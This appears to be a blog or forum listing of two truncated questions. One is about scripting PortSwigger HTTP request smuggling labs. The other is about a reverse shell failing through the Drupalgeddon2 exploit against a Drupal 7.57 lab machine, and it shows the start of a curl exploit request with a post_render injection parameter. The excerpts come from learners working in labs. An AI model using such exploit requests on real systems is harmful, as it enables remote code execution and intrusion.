Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Lately I have been attempting Portswiggers WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.

Intended solution from Burp Repeater:

POST / HTTP/1.1
Host:… Continue reading Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Sending a reverse shell command through the drupalgeddon vulnerability isn’t working

I’m trying to use the Drupalgeddon2 exploit (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) on drupal 7.57 ubuntu machine.

the requests:

-curl -k -s ‘http://192.168.204.141/?q=user/password&name[%23post_render][]=p… Continue reading Sending a reverse shell command through the drupalgeddon vulnerability isn’t working